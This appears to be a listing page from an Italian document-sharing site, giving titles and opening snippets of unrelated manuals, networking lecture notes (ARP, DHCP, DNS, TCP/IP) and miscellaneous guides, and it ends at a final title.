Ci relazioniamo dunque siamo 7_CECCHI.N 17-03-2008 10:12 Pagina 57 CONNESSIONI Ci relazioniamo dunque siamo Curiosità e trappole dell osservatore... siete voi gli insegnanti, mi insegnate voi, come fate in questa catastrofe, con il

Dettagli

PRESENTAZIONE DI UN SMS AL GATEWAY

PRESENTAZIONE DI UN SMS AL GATEWAY Interfaccia Full Ascii Con questa interfaccia è possibile inviare i dati al Server utilizzando solo caratteri Ascii rappresentabili e solo i valori che cambiano tra un sms e l altro, mantenendo la connessione

Dettagli

PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers

PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers PROCEDURA DI INSTALLAZIONE DI MYSQL E VolT per utenti Visual Trader e InteractiveBrokers La procedura di installazione è divisa in tre parti : Installazione dell archivio MySql, sul quale vengono salvati

Dettagli

Cos è un protocollo? Ciao. Ciao 2:00. tempo. Un protocollo umano e un protocollo di reti di computer:

Cos è un protocollo? Ciao. Ciao 2:00. <file> tempo. Un protocollo umano e un protocollo di reti di computer: Cos è un protocollo? Un protocollo umano e un protocollo di reti di computer: Ciao Ciao Hai l ora? 2:00 tempo TCP connection request TCP connection reply. Get http://www.di.unito.it/index.htm Domanda:

Dettagli

GLI ERRORI DI OUTLOOK EXPRESS

GLI ERRORI DI OUTLOOK EXPRESS Page 1 of 6 GLI ERRORI DI OUTLOOK EXPRESS 1) Impossibile inviare il messaggio. Uno dei destinatari non è stato accettato dal server. L'indirizzo di posta elettronica non accettato è "user@dominio altro

Dettagli

FileMaker Server 12. Guida introduttiva

FileMaker Server 12. Guida introduttiva FileMaker Server 12 Guida introduttiva 2007 2012 FileMaker, Inc. Tutti i diritti riservati. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker e Bento sono marchi di FileMaker,

Dettagli

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp.

Symbolic. Ambiti Operativi. Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. Symbolic Presente sul mercato da circa 10 anni Specializzata in Network Security Partner e distributore italiano di F-Secure Corp. La nostra mission è di rendere disponibili soluzioni avanzate per la sicurezza

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

MODBUS-RTU per. Specifiche protocollo di comunicazione MODBUS-RTU per controllo in rete dispositivi serie. Expert NANO 2ZN

MODBUS-RTU per. Specifiche protocollo di comunicazione MODBUS-RTU per controllo in rete dispositivi serie. Expert NANO 2ZN per Expert NANO 2ZN Specifiche protocollo di comunicazione MODBUS-RTU per controllo in rete dispositivi serie Expert NANO 2ZN Nome documento: MODBUS-RTU_NANO_2ZN_01-12_ITA Software installato: NANO_2ZN.hex

Dettagli

UBUNTU SERVER. Installazione e configurazione di Ubuntu Server. M. Cesa 1

UBUNTU SERVER. Installazione e configurazione di Ubuntu Server. M. Cesa 1 UBUNTU SERVER Installazione e configurazione di Ubuntu Server M. Cesa 1 Ubuntu Server Scaricare la versione deisiderata dalla pagina ufficiale http://www.ubuntu.com/getubuntu/download-server Selezioniare

Dettagli

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org GUIDA alla configurazione di un DVR o Router su dyndns.it in modalità compatibile www.dyndns.org Questa semplice guida fornisce le informazioni necessarie per eseguire la registrazione del proprio DVR

Dettagli

Comandi filtro: sed. Se non si specificano azioni, sed stampa sullo standard output le linee in input, lasciandole inalterate.

Comandi filtro: sed. Se non si specificano azioni, sed stampa sullo standard output le linee in input, lasciandole inalterate. Comandi filtro: sed Il nome del comando sed sta per Stream EDitor e la sua funzione è quella di permettere di editare il testo passato da un comando ad un altro in una pipeline. Ciò è molto utile perché

Dettagli

8. L'USO DEL PROGRAMMA DI POSTA ELETTRONICA INSIEME ALLA GESTIONE PROFESSIONALE DI DOCUMENTI IN FORMATO E-MAIL

8. L'USO DEL PROGRAMMA DI POSTA ELETTRONICA INSIEME ALLA GESTIONE PROFESSIONALE DI DOCUMENTI IN FORMATO E-MAIL This project funded by Leonardo da Vinci has been carried out with the support of the European Community. The content of this project does not necessarily reflect the position of the European Community

Dettagli

Guida ai Servizi Voce per l Utente. Guida ai ai Servizi Voce per l Utente

Guida ai Servizi Voce per l Utente. Guida ai ai Servizi Voce per l Utente Guida ai Servizi Voce per l Utente Guida ai ai Servizi Voce per l Utente 1 Indice Introduzione... 3 1 Servizi Voce Base... 4 1.1 Gestione delle chiamate... 4 1.2 Gestione del Numero Fisso sul cellulare...

Dettagli

Proteggi la tua faccia

Proteggi la tua faccia Proteggi la tua faccia Tutorial per i minori sull uso sicuro e consapevole di Facebook a cura di Clementina Crocco e Diana Caccavale È come se ogni giorno intingessimo una penna nell inchiostro indelebile

Dettagli

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account

Outlook Express 6 Microsoft Internet Explorer, Avvio del programma Creare un nuovo account Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito, semplice da utilizzare e fornisce

Dettagli

ARP (Address Resolution Protocol)

ARP (Address Resolution Protocol) ARP (Address Resolution Protocol) Il routing Indirizzo IP della stazione mittente conosce: - il proprio indirizzo (IP e MAC) - la netmask (cioè la subnet) - l indirizzo IP del default gateway, il router

Dettagli

Seagate Access per Personal Cloud Manuale utente

Seagate Access per Personal Cloud Manuale utente Seagate Access per Personal Cloud Manuale utente 2015 Seagate Technology LLC. Tutti i diritti riservati. Seagate, Seagate Technology, il logo Wave e FreeAgent sono marchi depositati o marchi registrati

Dettagli

G e s t i o n e U t e n z e C N R

G e s t i o n e U t e n z e C N R u t e n t i. c n r. i t G e s t i o n e U t e n z e C N R G U I D A U T E N T E Versione 1.1 Aurelio D Amico (Marzo 2013) Consiglio Nazionale delle Ricerche - Sistemi informativi - Roma utenti.cnr.it -

Dettagli

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...

INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:... INFORMAZIONI GENERALI...2 INSTALLAZIONE...5 CONFIGURAZIONE...6 ACQUISTO E REGISTRAZIONE...11 DOMANDE FREQUENTI:...13 CONTATTI:...14 Ultimo Aggiornamento del Documento: 23 / Marzo / 2012 1 INFORMAZIONI

Dettagli

Modulo. Programmiamo in Pascal. Unità didattiche COSA IMPAREREMO...

Modulo. Programmiamo in Pascal. Unità didattiche COSA IMPAREREMO... Modulo A Programmiamo in Pascal Unità didattiche 1. Installiamo il Dev-Pascal 2. Il programma e le variabili 3. Input dei dati 4. Utilizziamo gli operatori matematici e commentiamo il codice COSA IMPAREREMO...

Dettagli

Le Reti Informatiche

Le Reti Informatiche Le Reti Informatiche modulo 10 Prof. Salvatore Rosta www.byteman.it s.rosta@byteman.it 1 Nomenclatura: 1 La rappresentazione di uno schema richiede una serie di abbreviazioni per i vari componenti. Seguiremo

Dettagli

INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam.

INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 DHCP Dynamic Host Configuration Protocol Fausto Marcantoni fausto.marcantoni@unicam. Laurea in INFORMATICA INTERNET e RETI di CALCOLATORI A.A. 2014/2015 Capitolo 4 Dynamic Host Configuration Protocol fausto.marcantoni@unicam.it Prima di iniziare... Gli indirizzi IP privati possono essere

Dettagli

e-spare Parts User Manual Peg Perego Service Site Peg Perego [Dicembre 2011]

e-spare Parts User Manual Peg Perego Service Site Peg Perego [Dicembre 2011] Peg Perego Service Site Peg Perego [Dicembre 2011] 2 Esegui il login: ecco la nuova Home page per il portale servizi. Log in: welcome to the new Peg Perego Service site. Scegli il servizio selezionando

Dettagli

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO CLSMS SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO Sommario e introduzione CLSMS SOMMARIO INSTALLAZIONE E CONFIGURAZIONE... 3 Parametri di configurazione... 4 Attivazione Software...

Dettagli

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software.

Firewall. Generalità. Un firewall può essere sia un apparato hardware sia un programma software. Generalità Definizione Un firewall è un sistema che protegge i computer connessi in rete da attacchi intenzionali mirati a compromettere il funzionamento del sistema, alterare i dati ivi memorizzati, accedere

Dettagli

- Antivirus, Firewall e buone norme di comportamento

- Antivirus, Firewall e buone norme di comportamento Reti Di cosa parleremo? - Definizione di Rete e Concetti di Base - Tipologie di reti - Tecnologie Wireless - Internet e WWW - Connessioni casalinghe a Internet - Posta elettronica, FTP e Internet Browser

Dettagli

Guida agli strumenti etwinning

Guida agli strumenti etwinning Guida agli strumenti etwinning Registrarsi in etwinning Prima tappa: Dati di chi effettua la registrazione Seconda tappa: Preferenze di gemellaggio Terza tappa: Dati della scuola Quarta tappa: Profilo

Dettagli

Analisi dei requisiti e casi d uso

Analisi dei requisiti e casi d uso Analisi dei requisiti e casi d uso Indice 1 Introduzione 2 1.1 Terminologia........................... 2 2 Modello della Web Application 5 3 Struttura della web Application 6 4 Casi di utilizzo della Web

Dettagli

RefWorks Guida all utente Versione 4.0

RefWorks Guida all utente Versione 4.0 Accesso a RefWorks per utenti registrati RefWorks Guida all utente Versione 4.0 Dalla pagina web www.refworks.com/refworks Inserire il proprio username (indirizzo e-mail) e password NB: Agli utenti remoti

Dettagli

MANUALE DOS INTRODUZIONE

MANUALE DOS INTRODUZIONE MANUALE DOS INTRODUZIONE Il DOS è il vecchio sistema operativo, che fino a qualche anno fa era il più diffuso sui PC, prima dell avvento di Windows 95 e successori. Le caratteristiche principali di questo

Dettagli

Boot Camp Guida all installazione e alla configurazione

Boot Camp Guida all installazione e alla configurazione Boot Camp Guida all installazione e alla configurazione Indice 4 Introduzione 5 Cosa ti occorre 6 Panoramica dell installazione 6 Passo 1: verifica la presenza di aggiornamenti. 6 Passo 2: apri Assistente

Dettagli

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone

Mod. 4: L architettura TCP/ IP Classe 5 I ITIS G. Ferraris a.s. 2011 / 2012 Marcianise (CE) Prof. M. Simone Paragrafo 1 Prerequisiti Definizione di applicazione server Essa è un servizio che è in esecuzione su un server 1 al fine di essere disponibile per tutti gli host che lo richiedono. Esempi sono: il servizio

Dettagli

LEZIONE 4 DIRE, FARE, PARTIRE! ESERCIZI DI ITALIANO PER BRASILIANI

LEZIONE 4 DIRE, FARE, PARTIRE! ESERCIZI DI ITALIANO PER BRASILIANI In questa lezione ci siamo collegati via Skype con la Professoressa Paola Begotti, docente di lingua italiana per stranieri dell Università Ca Foscari di Venezia che ci ha parlato delle motivazioni che

Dettagli

Virtualizzazione e installazione Linux

Virtualizzazione e installazione Linux Virtualizzazione e installazione Linux Federico De Meo, Davide Quaglia, Simone Bronuzzi Lo scopo di questa esercitazione è quello di introdurre il concetto di virtualizzazione, di creare un ambiente virtuale

Dettagli

SERVER VIDEO 1-PORTA H.264

SERVER VIDEO 1-PORTA H.264 SERVER VIDEO 1-PORTA H.264 MANUALE UTENTE DN-16100 SALVAGUARDIA IMPORTANTE Tutti i prodotti senza piombo offerti dall'azienda sono a norma con i requisiti della legge Europea sulla restrizione per l'uso

Dettagli

iphone in azienda Guida alla configurazione per gli utenti

iphone in azienda Guida alla configurazione per gli utenti iphone in azienda Guida alla configurazione per gli utenti iphone è pronto per le aziende. Supporta Microsoft Exchange ActiveSync, così come servizi basati su standard, invio e ricezione di e-mail, calendari

Dettagli

Introduzione agli algoritmi e alla programmazione in VisualBasic.Net

Introduzione agli algoritmi e alla programmazione in VisualBasic.Net Lezione 1 Introduzione agli algoritmi e alla programmazione in VisualBasic.Net Definizione di utente e di programmatore L utente è qualsiasi persona che usa il computer anche se non è in grado di programmarlo

Dettagli

Alb@conference GO e Web Tools

Alb@conference GO e Web Tools Alb@conference GO e Web Tools Crea riunioni virtuali sempre più efficaci Strumenti Web di Alb@conference GO Guida Utente Avanzata Alb@conference GO Per partecipare ad un audioconferenza online con Alb@conference

Dettagli

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci Manuale di Remote Desktop Connection Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci 2 Indice 1 Introduzione 5 2 Il protocollo Remote Frame Buffer 6 3 Uso di Remote Desktop

Dettagli

Background (sfondo): Finestra: Una finestra serve a mostrare il contenuto di un disco o di una cartella -, chiamata anche directory.

Background (sfondo): Finestra: Una finestra serve a mostrare il contenuto di un disco o di una cartella -, chiamata anche directory. @ PC (Personal computer): Questa sigla identificò il primo personal IBM del 1981 a cura di R.Mangini Archiviazione: Il sistema operativo si occupa di archiviare i file. Background (sfondo): Cursore: Nei

Dettagli

HORIZON SQL CONFIGURAZIONE DI RETE

HORIZON SQL CONFIGURAZIONE DI RETE 1-1/9 HORIZON SQL CONFIGURAZIONE DI RETE 1 CARATTERISTICHE DI UN DATABASE SQL...1-2 Considerazioni generali... 1-2 Concetto di Server... 1-2 Concetto di Client... 1-2 Concetto di database SQL... 1-2 Vantaggi...

Dettagli

Corso di Alfabetizzazione Informatica

Corso di Alfabetizzazione Informatica Corso di Alfabetizzazione Informatica Scopo di questo corso, vuole essere quello di fornire ad ognuno dei partecipanti, indipendentemente dalle loro precedenti conoscenze informatiche, l apprendimento

Dettagli

FUNZIONI AVANZATE DI EXCEL

FUNZIONI AVANZATE DI EXCEL FUNZIONI AVANZATE DI EXCEL Inserire una funzione dalla barra dei menu Clicca sulla scheda "Formule" e clicca su "Fx" (Inserisci Funzione). Dalla finestra di dialogo "Inserisci Funzione" clicca sulla categoria

Dettagli

OVI-SUITE E NAVIGAZ. WEB CON CELLULARE

OVI-SUITE E NAVIGAZ. WEB CON CELLULARE OVI-SUITE E NAVIGAZ. WEB CON CELLULARE 1) Ovviamente anche su quelle GPRS, inoltre il tuo modello supporta anche l'edge. Si tratta di un "aggiornamento" del GPRS, quindi è leggermente più veloce ma in

Dettagli

Guida all uso. Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi.

Guida all uso. Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi. Guida all uso Come ricevere ed inviare Fax ed Sms tramite E-mail in 3 semplici passi. Legenda Singolo = Fax o SMS da inviare ad un singolo destinatario Multiplo = Fax o SMS da inviare a tanti destinatari

Dettagli

Come trovare clienti e ottenere contatti profilati e ordini in 24 ore!

Come trovare clienti e ottenere contatti profilati e ordini in 24 ore! Come trovare clienti e ottenere contatti profilati e ordini in 24 ore! oppure La Pubblicità su Google Come funziona? Sergio Minozzi Imprenditore di informatica da più di 20 anni. Per 12 anni ha lavorato

Dettagli

Elaidon Web Solutions

Elaidon Web Solutions Elaidon Web Solutions Realizzazione siti web e pubblicità sui motori di ricerca Consulente Lorenzo Stefano Piscioli Via Siena, 6 21040 Gerenzano (VA) Telefono +39 02 96 48 10 35 elaidonwebsolutions@gmail.com

Dettagli

Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk. by Gassi Vito info@gassielettronica.com

Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk. by Gassi Vito info@gassielettronica.com Creare una pen drive bottabile con Zeroshell oppure installarlo su hard disk by Gassi Vito info@gassielettronica.com Questa breve guida pratica ci consentirà installare Zeroshell su pen drive o schede

Dettagli

Inter Process Communication. Laboratorio Software 2008-2009 C. Brandolese

Inter Process Communication. Laboratorio Software 2008-2009 C. Brandolese Inter Process Communication Laboratorio Software 2008-2009 C. Brandolese Introduzione Più processi o thread Concorrono alla relaizzazione di una funzione applicativa Devono poter realizzare Sincronizzazione

Dettagli

Creare e ripristinare immagine di sistema con Windows 8

Creare e ripristinare immagine di sistema con Windows 8 Creare e ripristinare immagine di con Windows 8 La versione Pro di Windows 8 offre un interessante strumento per il backup del computer: la possibilità di creare un immagine completa del, ovvero la copia

Dettagli

Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi.

Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi. Internet Internet è universalmente nota come la Rete delle reti: un insieme smisurato di computer collegati tra loro per scambiarsi dati e servizi. Internet: la rete delle reti Alberto Ferrari Connessioni

Dettagli

GESTIONE DELLA E-MAIL

GESTIONE DELLA E-MAIL GESTIONE DELLA E-MAIL Esistono due metodologie, completamente diverse tra loro, in grado di consentire la gestione di più caselle di Posta Elettronica: 1. tramite un'interfaccia Web Mail; 2. tramite alcuni

Dettagli

DNS (Domain Name System) Gruppo Linux

DNS (Domain Name System) Gruppo Linux DNS (Domain Name System) Gruppo Linux Luca Sozio Matteo Giordano Vincenzo Sgaramella Enrico Palmerini DNS (Domain Name System) Ci sono due modi per identificare un host nella rete: - Attraverso un hostname

Dettagli

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP

Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP Protocolli di rete Sommario Introduzione ai protocolli di rete Il protocollo NetBEUI Il protocollo AppleTalk Il protocollo DLC Il protocollo NWLink Il protocollo TCP/IP Configurazione statica e dinamica

Dettagli

Inidirizzi IP e Nomi di Dominio. Domain Name System. Spazio dei Nomi Piatto. Gestione dello Spazio dei Nomi

Inidirizzi IP e Nomi di Dominio. Domain Name System. Spazio dei Nomi Piatto. Gestione dello Spazio dei Nomi I semestre 03/04 Inidirizzi IP e Nomi di Dominio Domain Name System Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/professori/auletta/ Università degli studi di Salerno Laurea in Informatica

Dettagli

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI

ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI ISTRUZIONI PER L INVIO TRAMITE PEC (POSTA ELETTRONICA CERTIFICATA) DI ISTANZE, COMUNICAZIONI E DOCUMENTI Firenze, mercoledì 10 Maggio 2011 VERSIONE 1.2 DEL 10 Maggio2011 Pagina 2 di 8 In queste pagine

Dettagli

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO:

ASTA IN GRIGLIA PRO. COSA PERMETTE DI FARE (per ora) Asta In Griglia PRO: ASTA IN GRIGLIA PRO Asta in Griglia PRO è un software creato per aiutare il venditore Ebay nella fase di post-vendita, da quando l inserzione finisce con una vendita fino alla spedizione. Il programma

Dettagli

Inizializzazione degli Host. BOOTP e DHCP

Inizializzazione degli Host. BOOTP e DHCP BOOTP e DHCP a.a. 2002/03 Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Inizializzazione degli Host Un

Dettagli

Software 2. Classificazione del software. Software di sistema

Software 2. Classificazione del software. Software di sistema Software 2 Insieme di istruzioni e programmi che consentono il funzionamento del computer Il software indica all hardware quali sono le operazioni da eseguire per svolgere determinati compiti Valore spesso

Dettagli

Windows Compatibilità

Windows Compatibilità Che novità? Windows Compatibilità CODESOFT 2014 é compatibile con Windows 8.1 e Windows Server 2012 R2 CODESOFT 2014 Compatibilità sistemi operativi: Windows 8 / Windows 8.1 Windows Server 2012 / Windows

Dettagli

SETTE MOSSE PER LIBERARSI DALL ANSIA

SETTE MOSSE PER LIBERARSI DALL ANSIA LIBRO IN ASSAGGIO SETTE MOSSE PER LIBERARSI DALL ANSIA DI ROBERT L. LEAHY INTRODUZIONE Le sette regole delle persone molto inquiete Arrovellarvi in continuazione, pensando e ripensando al peggio, è la

Dettagli

Che Cos'e'? Introduzione

Che Cos'e'? Introduzione Level 3 Che Cos'e'? Introduzione Un oggetto casuale e' disegnato sulla lavagna in modo distorto. Devi indovinare che cos'e' facendo click sull'immagine corretta sotto la lavagna. Piu' veloce sarai piu'

Dettagli

MANUALE DI UTILIZZO SMS MESSENGER

MANUALE DI UTILIZZO SMS MESSENGER MANUALE DI UTILIZZO SMS MESSENGER (Ultimo aggiornamento 14/05/2014) 2013 Skebby. Tutti i diritti riservati. INDICE INTRODUZIONE... 1 1.1. Cos è un SMS?... 1 1.2. Qual è la lunghezza di un SMS?... 1 1.3.

Dettagli

Express Import system

Express Import system Express Import system Manuale del destinatario Sistema Express Import di TNT Il sistema Express Import di TNT Le consente di predisporre il ritiro di documenti, pacchi o pallet in 168 paesi con opzione

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

1. SIMPLE PRESENT. Il Simple Present viene anche detto presente abituale in quanto l azione viene compiuta abitualmente.

1. SIMPLE PRESENT. Il Simple Present viene anche detto presente abituale in quanto l azione viene compiuta abitualmente. 1. SIMPLE PRESENT 1. Quando si usa? Il Simple Present viene anche detto presente abituale in quanto l azione viene compiuta abitualmente. Quanto abitualmente? Questo ci viene spesso detto dalla presenza

Dettagli

Web Solution 2011 EUR

Web Solution 2011 EUR Via Macaggi, 17 int.14 16121 Genova - Italy - Tel. +39 010 591926 /010 4074703 Fax +39 010 4206799 Cod. fisc. e Partita IVA 03365050107 Cap. soc. 10.400,00 C.C.I.A.A. 338455 Iscr. Trib. 58109 www.libertyline.com

Dettagli

ALFABETIZZAZIONE DI BASE Programma del Corso livello base

ALFABETIZZAZIONE DI BASE Programma del Corso livello base Un po di Storia ISP & Web Engineering ALFABETIZZAZIONE DI BASE Programma del Corso livello base Breve cenno sulla storia dell informatica: dagli albori ai giorni nostri; L evoluzione di Windows: dalla

Dettagli

Il World Wide Web: nozioni introduttive

Il World Wide Web: nozioni introduttive Il World Wide Web: nozioni introduttive Dott. Nicole NOVIELLI novielli@di.uniba.it http://www.di.uniba.it/intint/people/nicole.html Cos è Internet! Acronimo di "interconnected networks" ("reti interconnesse")!

Dettagli

Inter-Process Communication

Inter-Process Communication Inter-Process Communication C. Baroglio a.a. 2002-2003 1 Introduzione In Unix i processi possono essere sincronizzati utilizzando strutture dati speciali, appartenti al pacchetto IPC (inter-process communication).

Dettagli

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto

Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Installare e configurare Easy Peasy (Ubuntu Eee) su Asus Eee PC mini howto Augusto Scatolini (webmaster@comunecampagnano.it) Ver. 1.0 (marzo 2009) ultimo aggiornamento aprile 2009 Easy Peasy è una distribuzione

Dettagli

Manuale di KDE su Geert Jansen Traduzione del documento: Dario Panico Traduzione del documento: Samuele Kaplun Traduzione del documento: Daniele Micci

Manuale di KDE su Geert Jansen Traduzione del documento: Dario Panico Traduzione del documento: Samuele Kaplun Traduzione del documento: Daniele Micci Geert Jansen Traduzione del documento: Dario Panico Traduzione del documento: Samuele Kaplun Traduzione del documento: Daniele Micci 2 Indice 1 Introduzione 5 2 Usare KDE su 6 3 Funzionamento interno 8

Dettagli

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads.

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads. MailStore Proxy Con MailStore Proxy, il server proxy di MailStore, è possibile archiviare i messaggi in modo automatico al momento dell invio/ricezione. I pro e i contro di questa procedura vengono esaminati

Dettagli

Servizi DNS - SMTP FTP - TELNET. Programmi. Outlook Express Internet Explorer

Servizi DNS - SMTP FTP - TELNET. Programmi. Outlook Express Internet Explorer Servizi DNS - SMTP FTP - TELNET Programmi Outlook Express Internet Explorer 72 DNS Poiché riferirsi a una risorsa (sia essa un host oppure l'indirizzo di posta elettronica di un utente) utilizzando un

Dettagli

Pasta per due. Capitolo 1. Una mattina, Libero si sveglia e accende il computer C È POSTA PER TE! e trova un nuovo messaggio della sua amica:

Pasta per due. Capitolo 1. Una mattina, Libero si sveglia e accende il computer C È POSTA PER TE! e trova un nuovo messaggio della sua amica: Pasta per due 5 Capitolo 1 Libero Belmondo è un uomo di 35 anni. Vive a Roma. Da qualche mese Libero accende il computer tutti i giorni e controlla le e-mail. Minni è una ragazza di 28 anni. Vive a Bangkok.

Dettagli

Cosa fare in caso di violazioni di sicurezza

Cosa fare in caso di violazioni di sicurezza OUCH! Settembre 2012 IN QUESTO NUMERO I vostri account utente I vostri dispositivi I vostri dati Cosa fare in caso di violazioni di sicurezza L AUTORE DI QUESTO NUMERO Chad Tilbury ha collaborato alla

Dettagli

Routing (instradamento) in Internet. Internet globalmente consiste di Sistemi Autonomi (AS) interconnessi:

Routing (instradamento) in Internet. Internet globalmente consiste di Sistemi Autonomi (AS) interconnessi: Routing (instradamento) in Internet Internet globalmente consiste di Sistemi Autonomi (AS) interconnessi: Stub AS: istituzione piccola Multihomed AS: grande istituzione (nessun ( transito Transit AS: provider

Dettagli

4.Che cosa... di bello da vedere nella tua città? (A) c'è (B) è (C) ci sono (D) e

4.Che cosa... di bello da vedere nella tua città? (A) c'è (B) è (C) ci sono (D) e DIAGNOSTIC TEST - ITALIAN General Courses Level 1-6 This is a purely diagnostic test. Please only answer the questions that you are sure about. Since this is not an exam, please do not guess. Please stop

Dettagli

La configurazione degli indirizzi IP. Configurazione statica, con DHCP, e stateless

La configurazione degli indirizzi IP. Configurazione statica, con DHCP, e stateless La configurazione degli indirizzi IP Configurazione statica, con DHCP, e stateless 1 Parametri essenziali per una stazione IP Parametri obbligatori Indirizzo IP Netmask Parametri formalmente non obbligatori,

Dettagli

Introduzione. Esempio 1. Soluzione: SPOSTA_1.BAT

Introduzione. Esempio 1. Soluzione: SPOSTA_1.BAT Introduzione Un file batch è un file di testo di tipo ASCII che contiene una sequenza di comandi DOS. I file batch devono avere estensione.bat I comandi DOS all interno dei programmi batch sono eseguiti

Dettagli

Boot Camp Guida di installazione e configurazione

Boot Camp Guida di installazione e configurazione Boot Camp Guida di installazione e configurazione Indice 3 Introduzione 4 Panoramica dell'installazione 4 Passo 1: Verificare la presenza di aggiornamenti 4 Passo 2: Per preparare il Mac per Windows 4

Dettagli

Reti di Telecomunicazione Lezione 7

Reti di Telecomunicazione Lezione 7 Reti di Telecomunicazione Lezione 7 Marco Benini Corso di Laurea in Informatica marco.benini@uninsubria.it Il protocollo Programma della lezione file transfer protocol descrizione architetturale descrizione

Dettagli

WWW.TINYLOC.COM CUSTOMER SERVICE GPS/ RADIOTRACKING DOG COLLAR. T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com

WWW.TINYLOC.COM CUSTOMER SERVICE GPS/ RADIOTRACKING DOG COLLAR. T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com WWW.TINYLOC.COM CUSTOMER SERVICE T. (+34) 937 907 971 F. (+34) 937 571 329 sales@tinyloc.com GPS/ RADIOTRACKING DOG COLLAR MANUALE DI ISTRUZIONI ACCENSIONE / SPEGNERE DEL TAG HOUND Finder GPS Il TAG HOUND

Dettagli

L 8 maggio 2002 il Ministero

L 8 maggio 2002 il Ministero > > > > > Prima strategia: ascoltare le esigenze degli utenti, semplificare il linguaggio e la navigazione del sito. Seconda: sviluppare al nostro interno le competenze e le tecnologie per gestire in proprio

Dettagli

Elementi di Informatica e Programmazione

Elementi di Informatica e Programmazione Elementi di Informatica e Programmazione Le Reti di Calcolatori (parte 2) Corsi di Laurea in: Ingegneria Civile Ingegneria per l Ambiente e il Territorio Università degli Studi di Brescia Docente: Daniela

Dettagli

R.Focardi Laboratorio di Ingegneria del Software 6. 1

R.Focardi Laboratorio di Ingegneria del Software 6. 1 Networking Java permette comunicazioni in rete basate sul concetto di socket, che permette di vedere la comunicazione in termini di flusso (stream), in modo analogo all input-output di file, usando Stream

Dettagli

Present Perfect SCUOLA SECONDARIA I GRADO LORENZO GHIBERTI ISTITUTO COMPRENSIVO DI PELAGO CLASSI III C/D

Present Perfect SCUOLA SECONDARIA I GRADO LORENZO GHIBERTI ISTITUTO COMPRENSIVO DI PELAGO CLASSI III C/D SCUOLA SECONDARIA I GRADO LORENZO GHIBERTI ISTITUTO COMPRENSIVO DI PELAGO CLASSI III C/D Present Perfect Affirmative Forma intera I have played we have played you have played you have played he has played

Dettagli

ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE

